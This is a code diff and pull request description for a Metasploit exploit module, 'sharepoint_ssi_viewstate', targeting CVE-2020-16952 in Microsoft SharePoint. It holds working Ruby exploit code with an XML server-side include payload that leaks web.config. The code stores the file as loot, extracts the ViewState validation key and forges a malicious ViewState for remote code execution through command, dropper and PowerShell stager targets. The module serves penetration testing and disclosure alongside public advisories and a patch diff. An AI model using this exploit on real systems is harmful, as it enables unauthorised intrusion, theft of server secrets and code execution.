+      fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
+    end
+
+    vprint_good('Successfully executed command')
+  end
+
+  def ssi_page
+    <<~XML
+      <WebPartPages:DataFormWebPart runat="server">
+      <ParameterBindings>
+        <ParameterBinding Name="#{ssi_param}" Location="ServerVariable(HTTP_#{ssi_header})" DefaultValue="" />
+      </ParameterBindings>
+        <xsl>
+          <xsl:stylesheet xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
+            <xsl:param name="#{ssi_param}" />
+            <xsl:template match="/">
+              <xsl:value-of select="$#{ssi_param}" disable-output-escaping="yes" />
+            </xsl:template>
+          </xsl:stylesheet>
+        </xsl>
+      </WebPartPages:DataFormWebPart>
+    XML
+  end
+
+  def ssi_path
+    @ssi_path ||= normalize_uri(target_uri.path, "#{rand_text_alphanumeric(8..42)}.aspx")
+  end
+
+  def ssi_header
+    @ssi_header ||= rand_text_alphanumeric(8..42)
+  end
+
+  def ssi_param
+    @ssi_param ||= rand_text_alphanumeric(8..42)
+  end
+
+end

--- a/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
+++ b/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
@@ -26,6 +26,10 @@ class MetasploitModule < Msf::Exploit::Remote
           This exploit is authenticated and requires a user with page creation
           privileges, which is a standard permission in SharePoint.
 
+          The web.config file will be stored in loot once retrieved, and the
+          VALIDATION_KEY option can be set to short-circuit the SSI and trigger
+          the ViewState deserialization.
+
           Tested against SharePoint 2019 on Windows Server 2016.
         },
         'Author' => [
@@ -212,7 +216,13 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NotFound, "Failed to retrieve #{ssi_path}")
     end
 
-    unless (@validation_key = extract_viewstate_validation_key(res.get_xml_document))
+    unless (web_config = res.get_xml_document.at('//configuration'))
+      fail_with(Failure::NotFound, 'Failed to extract web.config from response')
+    end
+
+    print_good(store_loot('web.config', 'text/xml', rhost, web_config.to_xml, 'web.config', name))
+
+    unless (@validation_key = extract_viewstate_validation_key(web_config))
       fail_with(Failure::NotFound, 'Failed to extract ViewState validation key')
     end
 


### PR DESCRIPTION
# Please see @stevenseeley's [advisory](https://srcincite.io/advisories/src-2020-0022/) and [exploit](https://srcincite.io/pocs/cve-2020-16952.py.txt).

## Metasploit module

```
msf6 exploit(windows/http/sharepoint_ssi_viewstate) > info

       Name: Microsoft SharePoint Server-Side Include and ViewState RCE
     Module: exploit/windows/http/sharepoint_ssi_viewstate
   Platform: Windows
       Arch: cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-10-13

Provided by:
  mr_me
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 config-changes
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 unreliable-session

Available targets:
  Id  Name
  --  ----
  0   Windows Command
  1   Windows Dropper
  2   PowerShell Stager

Check supported:
  Yes

Basic options:
  Name            Current Setting  Required  Description
  ----            ---------------  --------  -----------
  HttpPassword                     no        SharePoint password
  HttpUsername                     no        SharePoint username
  Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT           80               yes       The target port (TCP)
  SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT         8080             yes       The local port to listen on.
  SSL             false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI       /                yes       Base path
  URIPATH                          no        The URI to use for this exploit (default is random)
  VALIDATION_KEY                   no        ViewState validation key
  VHOST                            no        HTTP server virtual host

Payload information:

Description:
  This module exploits a server-side include (SSI) in SharePoint to
  leak the web.config file and forge a malicious ViewState with the
  extracted validation key. This exploit is authenticated and requires
  a user with page creation privileges, which is a standard permission
  in SharePoint. The web.config file will be stored in loot once
  retrieved, and the VALIDATION_KEY option can be set to short-circuit
  the SSI and trigger the ViewState deserialization. Tested against
  SharePoint 2019 on Windows Server 2016.

References:
  https://cvedetails.com/cve/CVE-2020-16952/
  https://srcincite.io/advisories/src-2020-0022/
  https://srcincite.io/pocs/cve-2020-16952.py.txt
  https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952

msf6 exploit(windows/http/sharepoint_ssi_viewstate) >
```

## Patch

The patch for [CVE-2020-16952](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952) enables `blockServerSideIncludes` in the `VerifyControlOnSafeList()` call within `CreateChildControls()`:

```diff
- EditingPageParser.VerifyControlOnSafeList(this._dataSourcesString.Trim(), null, base.Web, false);
+ EditingPageParser.VerifyControlOnSafeList(this._dataSourcesString.Trim(), null, base.Web, true);
```

```csharp
internal static void VerifyControlOnSafeList(string dscXml, RegisterDirectiveManager registerDirectiveManager, SPWeb web, bool blockServerSideIncludes = false)
```